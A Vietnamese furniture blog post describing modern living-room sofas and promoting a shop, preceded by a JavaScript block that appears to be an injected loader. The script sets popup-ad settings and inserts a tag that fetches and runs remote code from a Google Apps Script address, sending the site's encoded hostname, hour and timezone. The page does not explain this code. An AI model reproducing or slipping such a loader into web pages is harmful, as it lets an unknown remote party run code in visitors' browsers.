var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Các loại sofa hiện đại cho phòng khách

Sofa hiện đại cho phòng khách có những loại nào? Thiết kế sofa phòng khách mang phong cách hiện đại là xu hướng ngày nay và luôn tạo nên vẻ đẹp cực kì sang trọng.

Hãy cùng tìm hiểu về các loại sofa hiện đại cho phòng khách hiện nay nhé.

Các loại sofa hiện đại cho phòng khách

Mỗi loại sofa hiện đại sau đây cho phòng khách đều là dòng sản phẩm phổ biến trên thị trường và được nhiều người yêu thích.

Sofa văng hiện đại

Sofa văng hiện đại cho phòng khách hiện đại với thiết kế tinh tế và sang trọng. Bạn có thể chọn sofa văng chữ I hay sofa văng bộ tùy vào diện tích. Sofa văng bộ gồm nhiều ghế nên hợp với phòng khách lớn, sofa văng chữ I nhỏ gọn sẽ hợp với phòng khách nhỏ.

các loại sofa hiện đại cho phòng khách
Sofa văng hiện đại cho phòng khách hiện đại


Sofa góc hiện đại

Bộ sofa góc mang phong cách hiện đại cho phòng khách hiện đại đem lại sự trẻ trung và cực sang trọng. Sofa góc hiện đại có thể làm bằng da hoặc vải nỉ. Sofa góc cho phòng khách dễ bài trí, gọn gàng, tạo độ thoáng và tiết kiệm diện tích.

các loại sofa hiện đại cho phòng khách
Sofa góc hiện đại dễ dàng bài trí, tiết kiệm diện tích, vẻ đẹp sang và rất trẻ trung


Sofa đơn hiện đại

Sofa đơn hiện đại có thể là sofa da nhập khẩu hoặc sofa bằng vải nỉ. Sofa đơn hiện đại cũng như sofa văng, sofa góc rất đơn giản nhưng sang và tinh tế. Sofa đơn thích hợp với những phòng khách có diện tích bé xinh.

các loại sofa hiện đại cho phòng khách
Mẫu sofa đơn hiện đại thiết kế độc đáo

Đặc trưng của sofa hiện đại cho phòng khách

Sofa hiện đại cho phòng khách còn nhiều loại khác nhau, trên đây là 3 kiểu sofa đặc trưng được sử dụng nhiều nhất. Đặc điểm của dòng sản phẩm sofa hiện đại chính là sự gọn gàng, đơn giản trong thiết kế. Một bộ sofa sẽ không cầu kì, không uốn lượn mà thay vào đó là sự đơn giản, tinh tế chứ không hề đơn điệu. Sofa hiện đại có rất nhiều các màu sắc, kiểu dáng khác nhau. Bài trí sofa trong không gian tạo giá trị thẩm mĩ cực sang, cực đẳng cấp.

Sofa hiện đại cho phòng khách trở thành xu hướng chọn lựa hiện nay của rất nhiều gia đình. Nội Thất Xinh cung cấp và sản xuất rất nhiều các loại sofa hiện đại dành cho quý khách hàng với chất lượng tốt nhất. Hãy đến ngay với chúng tôi để có sự chọn lựa ưng ý nhất.